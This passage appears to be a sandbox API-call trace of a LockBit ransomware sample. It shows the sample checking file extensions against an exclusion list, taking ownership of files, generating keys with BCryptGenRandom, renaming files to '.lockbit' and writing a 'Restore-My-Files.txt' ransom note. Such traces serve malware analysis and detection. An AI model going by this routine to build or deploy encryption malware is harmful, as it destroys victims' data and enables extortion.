Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png") returned=".png" [0087.763] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.763] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.763] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.763] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.763] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.763] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.764] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.764] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.764] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.764] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.764] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.765] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.765] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.765] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.765] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png.lockbit") returned 101 [0087.765] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.765] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.766] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.766] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.766] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.767] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.767] RtlFreeAnsiString (AnsiString="\\") [0087.767] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.767] malloc (_Size=0x200) returned 0x77d800 [0087.767] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.767] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.767] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.767] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.768] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.768] CloseHandle (hObject=0x3c4) returned 1 [0087.769] free (_Block=0x77d800) [0087.769] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.769] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.769] malloc (_Size=0x40068) returned 0x1ff1e60 [0087.769] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5088) returned 1 [0087.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0087.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0087.771] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.776] malloc (_Size=0xe0) returned 0x77d800 [0087.776] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe0, FileInformationClass=0xa) returned 0x0 [0087.776] free (_Block=0x77d800) [0087.776] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.777] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.777] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.777] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc95011, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.777] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.777] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.777] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0087.777] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.777] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.777] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.778] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.778] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.778] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.778] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.778] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.779] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.779] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.780] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.780] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.780] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.780] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.780] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.780] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.780] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.780] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0087.780] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.780] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.780] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.780] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.781] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.781] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.782] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 107 [0087.782] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.782] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.783] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.783] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.783] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.783] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.783] RtlFreeAnsiString (AnsiString="\\") [0087.783] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0087.783] malloc (_Size=0x200) returned 0x77d800 [0087.783] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.783] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.784] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.785] CloseHandle (hObject=0x3a0) returned 1 [0087.785] free (_Block=0x77d800) [0087.785] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0087.785] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.785] malloc (_Size=0x40068) returned 0x3d70048 [0087.785] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3130) returned 1 [0087.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0087.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0087.786] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.792] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.792] malloc (_Size=0xec) returned 0x77d800 [0087.792] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xec, FileInformationClass=0xa) returned 0x0 [0087.792] free (_Block=0x77d800) [0087.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.793] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.793] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.793] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.793] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.793] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.793] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0087.793] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.793] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.793] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.794] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.794] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.795] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.795] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.795] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.795] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.795] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.795] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.795] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.795] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.795] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.795] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.795] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.796] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png") returned=".png" [0087.796] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.796] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.796] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".frm", lpString2=".png") 